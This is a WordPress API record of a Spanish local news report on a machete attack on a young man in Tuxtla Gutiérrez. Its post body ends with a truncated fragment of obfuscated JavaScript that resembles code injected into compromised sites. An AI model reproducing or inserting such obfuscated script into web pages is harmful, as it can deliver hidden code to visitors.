{"id":12576,"date":"2023-11-13T02:35:31","date_gmt":"2023-11-13T02:35:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12576"},"modified":"2023-11-13T02:35:32","modified_gmt":"2023-11-13T02:35:32","slug":"hieren-a-machetazos-a-joven-en-la-colonia-bienestar-social","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12576","title":{"rendered":"Hieren a machetazos a joven en la Colonia Bienestar Social"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-2.26.16-PM-768x1024.jpeg\" alt=\"\" class=\"wp-image-12577\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-2.26.16-PM-768x1024.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-2.26.16-PM-225x300.jpeg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-2.26.16-PM-1152x1536.jpeg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-12-at-2.26.16-PM.jpeg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este domingo un hombre fue herido a machetazos luego de ser interceptado por 4 sujetos en la Calle Jos\u00e9 Mar\u00eda Morelos y Pav\u00f3n y Avenida Carlos Vidal de la Colonia Bienestar Social.<\/p>\n\n\n\n<p>El <a><\/a>relato de los testigos indicaron que, el joven de 27 a\u00f1os fue abordado y comenzaron a agredirlo por motivos desconocidos.<\/p>\n\n\n\n<p>Uno de los agresores sac\u00f3 un machete, y le asest\u00f3 por lo menos tres golpes, en los brazos y pierna.<\/p>\n\n\n\n<p>Los agresores salieron corriendo con rumbo desconocido mientras que el lesionado qued\u00f3 tendido sangrando.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana para atender al lesionado y trasladarlo al hospital Gilberto G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Elementos de la polic\u00eda Estatal arribaron al lugar para montar un operativo de b\u00fasqueda sin obtener resultados positivos.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/photo\/?fbid=752024336970063&amp;set=pcb.752024423636721&amp;__cft__[0]=AZVVAfewCx6SadA7Fce8jDibRYlLg-P1ZeQxcuZW75jMMXNc1pi9AIk5wSiO5ixAOCYH-RiKmTzyYTNJmIMWSlgTA4DJuq-ZRv9LW9hBG_ivXtoYEcv_Z2ICSfEfOIUuLsodIA8Qbt_pNx-pL2iUX-T4NDSM2JNrJhNZ-7ru-561qO7Bp3p6v158By4x1mArxa8&amp;__tn__=*bH-R\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/photo\/?fbid=752024373636726&amp;set=pcb.752024423636721&amp;__cft__[0]=AZVVAfewCx6SadA7Fce8jDibRYlLg-P1ZeQxcuZW75jMMXNc1pi9AIk5wSiO5ixAOCYH-RiKmTzyYTNJmIMWSlgTA4DJuq-ZRv9LW9hBG_ivXtoYEcv_Z2ICSfEfOIUuLsodIA8Qbt_pNx-pL2iUX-T4NDSM2JNrJhNZ-7ru-561qO7Bp3p6v158By4x1mArxa8&amp;__tn__=*bH-R\"><\/a><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este domingo un hombre fue herido a machetazos luego de ser interceptado por 4 sujetos en la Calle Jos\u00e9 Mar\u00eda Morelos y Pav\u00f3n y Avenida Carlos Vidal de la Colonia Bienestar Social. El relato de los testigos indicaron que, el joven de 27 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12577,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12576","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12576","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12576"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12576\/revisions"}],"predecessor-version":[{"id":12578,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12576\/revisions\/12578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12577"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12576"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12576"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12576"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}